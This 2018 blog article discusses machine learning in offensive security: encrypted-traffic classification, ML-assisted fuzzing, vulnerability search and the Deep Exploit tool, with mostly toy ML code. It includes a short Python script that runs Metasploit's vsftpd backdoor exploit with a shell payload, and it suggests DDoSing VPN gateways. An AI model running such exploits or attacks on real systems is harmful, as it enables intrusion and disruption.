
Machine Learning in Offensive Security

August 24, 2018, by David Balaban

Contrary to popular belief, machine learning is not an invention of the 21st century. What has appeared over the last twenty years is hardware powerful enough to make neural networks and other machine-learning models practical for everyday needs. According to CB Insights, almost 90 start-ups (two of them valued at over one billion US dollars) are trying to automate or partially automate routine, monotonous tasks.

Part of machine learning's sudden appeal is its association with artificial intelligence. That is also a problem: AI in security is currently surrounded by hype and marketing noise. The phrase "artificial intelligence" attracts investors, people call even the simplest correlation of events "AI," and buyers of ready-made solutions do not get what they hoped for (even if those expectations were too high to begin with).


But it's important to remember that machine learning is not entirely the same as artificial intelligence. Artificial intelligence refers to the broader concept of machines being intelligent and able to think, while machine learning is a subset and current application of that idea. In machine learning, a computer system is given the chance to "learn" from sample inputs, distinguishing X from Y or predicting future outcomes based on past data. Over time, a machine can, essentially, be trained to recognize and carry out certain functions.

Machine learning is already used in a dozen different areas, but it has not become a cybersecurity "magic pill" due to several serious limitations.

The first limitation is the narrow applicability of each particular model. A neural network can only do one thing well: if it recognizes images well, the same network cannot recognize audio. The same is true in infosec: a model trained to classify events from network sensors and detect attacks on network equipment will probably be useless against mobile devices. But if the customer is a fan of AI, they will keep buying anyway.

The second limitation is the lack of training data. Most solutions are built on pre-existing datasets rather than on your own corporate data.

The third and probably most important limitation: machine-learning products cannot be held accountable for their decisions. Even the developer of a "Unique Means of Protection with Artificial Intelligence" can respond to complaints with: "Well, what do you expect? The neural network is a black box! No one can be 100% sure why it decided one way and not another." Therefore, information security incidents still have to be confirmed by people. Machines help, but people still carry the responsibility.

There are plenty of problems with using machine learning for protection, and perhaps they will be resolved sooner or later. But what about the other side? Can ML and AI become part of the attacker's toolkit?

 

Where Machine Learning Can Be Used

 

It's currently most reasonable to use ML in the following areas:

  • Where it is necessary to create something similar to what the neural network has already encountered
  • Where it is necessary to reveal patterns that are not obvious to a human being

ML solutions are already doing very well in these areas. Beyond that, some routine tasks can simply be accelerated. For example, some experts have already written about automating attacks with Python and Metasploit (see Sources); a minimal sketch of the idea follows.
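To give a feel for what that automation looks like, here is a minimal sketch of driving Metasploit from Python. It assumes the pymetasploit3 library and a running msfrpcd daemon; the exploit module, payload and address are illustrative placeholders, not a recipe for any particular target.

```python
# A minimal sketch, assuming pymetasploit3 (pip install pymetasploit3)
# and a running Metasploit RPC daemon: msfrpcd -P yourpassword
# Module, payload and address below are placeholders.
from pymetasploit3.msfrpc import MsfRpcClient

# Connect to the local msfrpcd instance
client = MsfRpcClient('yourpassword', ssl=True)

# Select an exploit module and configure its target
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.0.2.10'  # example address, not a real target

# Select a compatible payload and run the exploit
payload = client.modules.use('payload', 'cmd/unix/interact')
exploit.execute(payload=payload)

# Any sessions opened by the exploit show up here
print(client.sessions.list)
```

The point of scripting the framework is that these same few calls can be looped over whole ranges of hosts and modules, exactly the kind of routine work worth automating.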

 

Attacking Cryptosystems

 

Suppose the victim has built their own virtual private network, or uses one of the better commercial VPN services, and all traffic is encrypted. Suppose we can listen to the encrypted traffic of the attacked organization, but we would like to know what exactly is in that traffic.

The idea behind this was presented by Cisco in their article "Detecting Encrypted Malware Traffic (Without Decryption)." After all, if malicious objects can be detected from NetFlow, TLS and DNS metadata alone, what prevents us from using the same data to identify communications between employees of the attacked organization, or between employees and corporate IT services?

It is important to note that an AI used this way can build profiles of these communication channels, learn from them and model likely future communications. From that point on, triggers and alerts could be implemented to warn of a looming cyberattack.

Attacking cryptosystems head-on is very expensive. Instead, using the addresses and ports of source and receiver, the number of packets transmitted, their sizes and their timestamps, we can try to understand the encrypted traffic without launching a full cryptographic attack. The sketch below illustrates the approach.
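As a toy illustration, the sketch below trains a scikit-learn classifier on exactly those flow-metadata features. The flows and the labeling rule are synthetic stand-ins invented for the example; in practice you would label real captures of known traffic.

```python
# Toy sketch: classify encrypted flows from metadata alone, no decryption.
# Features mirror what NetFlow-style telemetry exposes; the data and the
# labeling rule are synthetic stand-ins for labeled real captures.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
n = 1000

# Per-flow features: [dst_port, packets, mean_packet_size_bytes,
#                     duration_sec, mean_inter_arrival_ms]
X = np.column_stack([
    rng.choice([443, 993, 8443], n),
    rng.integers(2, 500, n),
    rng.uniform(60, 1500, n),
    rng.uniform(0.01, 120.0, n),
    rng.uniform(1.0, 500.0, n),
])

# Invented ground truth: short flows of small packets are "interactive chat"
y = ((X[:, 2] < 400) & (X[:, 3] < 10)).astype(int)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
print(f"held-out accuracy: {clf.score(X_te, y_te):.2f}")
```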

Further, having identified the VPN crypto-gateways (or the end nodes, in the case of p2p communications), we can DDoS them, forcing users to switch to less-secure communication methods that may be easier to attack.

 

Looking for Bugs and Software Vulnerabilities

 

Perhaps the most famous attempt to automate the search for, exploitation of and patching of vulnerabilities was 2016's DARPA Cyber Grand Challenge (CGC). Seven fully autonomous defense systems built by different teams competed in a final CTF-like battle.

Of course, the goal was noble: to find the best system for protecting infrastructure, IoT and applications in real time with minimal human participation. But you can look at the results from a different angle: an AI system of this kind could easily be modified to exploit vulnerabilities instead of patching them.

There are other known methods of semi-automated vulnerability detection. The first direction is automating fuzzing: feeding random, invalid inputs to a program to uncover errors and vulnerabilities. CGC participants made wide use of the fuzzer american fuzzy lop (AFL). Wherever there is a lot of structured and semi-structured data, ML models can find recurring patterns: if some input has "brought down" the application once, a similar approach will likely work elsewhere. A stripped-down illustration of mutation fuzzing follows.
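AFL itself is coverage-guided and far more sophisticated, but the core mutate-and-observe loop fits in a few lines. In this sketch the target is a hypothetical in-process parser; a real harness would execute the program under test and watch for crash signals.

```python
# Stripped-down mutation fuzzing: randomly corrupt a seed input and record
# which inputs make the target fall over. 'target' is a hypothetical parser
# standing in for the real program under test.
import random

def target(data: bytes) -> None:
    # Invented bug: crashes on a specific malformed header
    if len(data) > 3 and data[0] == 0xFF and data[1] == data[2]:
        raise RuntimeError("parser crash")

def mutate(seed: bytes, rng: random.Random) -> bytes:
    buf = bytearray(seed)
    for _ in range(rng.randint(1, 4)):          # corrupt a few random bytes
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    return bytes(buf)

rng = random.Random(1337)
seed = b"\x00" * 16
crashes = []
for _ in range(100_000):
    sample = mutate(seed, rng)
    try:
        target(sample)
    except RuntimeError:
        crashes.append(sample)                  # candidates for triage

print(f"found {len(crashes)} crashing inputs")
```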

The same applies to static code analysis, and to dynamic analysis of executables when the application's source code is unavailable. Neural networks can search not just for known vulnerable code fragments, but for code that merely looks like them. Fortunately, there are plenty of places to find code with confirmed (and fixed) vulnerabilities to learn from. The researcher then only has to verify the suspicions, and with each newly found bug such a network gets smarter. This approach avoids relying solely on pre-written signatures. A toy similarity search is sketched below.
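A heavily simplified mock-up of that "looks like known-vulnerable code" search can be built from off-the-shelf text tooling: embed snippets as character n-gram TF-IDF vectors and rank candidates by similarity to confirmed-vulnerable examples. Production systems use learned code representations; the snippets here are illustrative.

```python
# Toy similarity search: rank candidate snippets by how much they resemble
# known-vulnerable code. Snippets are illustrative; real systems learn far
# richer code representations than character n-grams.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

known_vulnerable = [
    'strcpy(dest, user_input);',             # unbounded copy
    'sprintf(buf, "%s", request_body);',     # unbounded format write
]
candidates = [
    'strncpy(dest, user_input, sizeof(dest));',
    'strcpy(tmp, argv[1]);',
    'printf("hello world\\n");',
]

vec = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5))
V = vec.fit_transform(known_vulnerable + candidates)
k = len(known_vulnerable)
sims = cosine_similarity(V[k:], V[:k])       # candidates vs. known-bad

for snippet, row in zip(candidates, sims):
    print(f"{row.max():.2f}  {snippet}")     # higher = worth a human look
```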

In dynamic analysis, if a neural network can learn the relationships between input data (including user-supplied data), execution order, system calls, memory allocation and confirmed vulnerabilities, it will eventually be able to hunt for new ones.
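A toy version of that idea: treat each execution as its system-call sequence, featurize the n-grams and fit a classifier to predict crashes. The traces and labels below are invented purely for illustration.

```python
# Toy dynamic-analysis sketch: learn which syscall patterns precede a
# crash. Traces and crash labels are invented for illustration only.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression

traces = [
    "open read read close",
    "open read mmap memcpy close",
    "open mmap memcpy memcpy write",    # pattern we pretend precedes a crash
    "open read write close",
    "open mmap memcpy memcpy close",
    "open read close",
]
crashed = [0, 0, 1, 0, 1, 0]

vec = CountVectorizer(ngram_range=(1, 2))   # unigrams and bigrams of syscalls
X = vec.fit_transform(traces)
model = LogisticRegression().fit(X, crashed)

new_trace = ["open mmap memcpy memcpy memcpy write"]
prob = model.predict_proba(vec.transform(new_trace))[0, 1]
print(f"estimated crash probability: {prob:.2f}")
```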

 

Automating the Process of Exploitation

 

The tool Deep Exploit applies this kind of automation and works in two modes: a data-collection (intelligence) mode and a brute-force mode.

In the first mode, Deep Exploit identifies all open ports on the attacked node and launches exploits that previously worked for such a combination.

In the second mode, the attacker specifies the product name and port number, and Deep Exploit launches "carpet bombing" using all available combinations of exploits, payloads and targets.

Deep Exploit can independently learn exploitation methods through reinforcement learning, based on the feedback it receives from the system under attack. The toy sketch below isolates that reinforcement idea.
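Deep Exploit couples its learning agent to Metasploit; the sketch below only illustrates the reinforcement signal in a simulated environment: exploit/service combinations that succeed get rewarded and are tried first next time. Everything here (the services, exploits and hidden "ground truth") is invented for illustration.

```python
# Toy reinforcement loop for exploit selection against a simulated target.
# All names and the hidden ground truth are invented for illustration.
import random

services = ["ftp", "http", "smb"]
exploits = ["exploit_a", "exploit_b", "exploit_c"]

# Hidden from the agent: which exploit actually works on which service
works = {("ftp", "exploit_a"), ("http", "exploit_c"), ("smb", "exploit_b")}

Q = {(s, e): 0.0 for s in services for e in exploits}   # learned values
alpha, epsilon = 0.5, 0.2
rng = random.Random(0)

for _ in range(2000):
    s = rng.choice(services)                  # service found on an open port
    if rng.random() < epsilon:                # occasionally explore
        e = rng.choice(exploits)
    else:                                     # otherwise use best known action
        e = max(exploits, key=lambda a: Q[(s, a)])
    reward = 1.0 if (s, e) in works else -0.1 # session opened vs. failure
    Q[(s, e)] += alpha * (reward - Q[(s, e)]) # one-step value update

for s in services:
    best = max(exploits, key=lambda a: Q[(s, a)])
    print(f"{s}: try {best} first")
```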

The use of AI, and of neural networks in particular, can help in two specific areas. These are as follows:

 

Vulnerability Discovery

 

AI tools can do a much better job of modeling newer threat profiles because they have already been trained on previous datasets. For example, they "can suggest new payloads to discover new issues with better probability" (Forbes).

 

Exploitation

 

This is the phase where the attacker takes the vulnerabilities they have discovered and tries to capitalize on those weaknesses to cause further damage and/or capture more sensitive data. AI can help here because it can model and predict potential exploit scenarios much faster than a human being could, and with a higher degree of statistical accuracy.

 

Conclusion: Can AI Replace Pentest Teams?

 

Probably not yet. Machines struggle to build logical chains of exploitation out of known vulnerabilities, and this often directly affects whether the goal of a penetration test is reached. A machine can find a vulnerability, and can even create an exploit on its own, but it cannot assess the impact of that vulnerability on a specific information system or on the business processes of the organization as a whole.

Automated systems also generate a lot of noise on the attacked system, which defensive tools detect easily. Machines work clumsily. Social engineering can help reduce this noise and build a picture of the system, but machines are not very good at social engineering either.

And machines have no wit, intuition or hunches. For example, there was a project in which the most cost-effective testing approach turned out to be using a radio-controlled model.

 

Sources

 

Cybersecurity's Next Frontier: 80+ Companies Using Artificial Intelligence To Secure The Future In One Infographic, Research Briefs

Automating the actions of the attacker using metasploit and Python, Scan For Security

Detecting Encrypted Malware Traffic (Without Decryption), Cisco Blogs

How AI Can Be Applied to Cyberattacks, Forbes


David Balaban